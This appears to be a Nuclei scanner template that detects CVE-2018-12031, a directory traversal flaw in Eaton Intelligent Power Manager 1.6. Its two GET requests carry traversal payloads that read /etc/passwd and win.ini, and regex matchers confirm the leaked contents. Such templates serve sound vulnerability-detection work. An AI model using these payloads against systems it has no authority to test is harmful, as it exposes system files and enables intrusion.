46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
id: CVE-2018-12031
|
|
|
|
info:
|
|
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
|
|
author: daffainfo
|
|
severity: critical
|
|
description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
|
|
remediation: |
|
|
Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
|
- https://www.exploit-db.com/exploits/48614
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-12031
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01411
|
|
epss-percentile: 0.84972
|
|
cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: eaton
|
|
product: intelligent_power_manager
|
|
tags: edb,cve,cve2018,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "\\[(font|extension|file)s\\]"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022032a1d358ee83ff9e664f21547ed4b88f1da5c9fae42fc6de52043e9f8f956bcc02206937b56ef7e5a38f12d6d01f488c05c248f3b6d8c1a1b17ffddaf3b6b5476f54:922c64590222798bb761d5b6d8e72950 |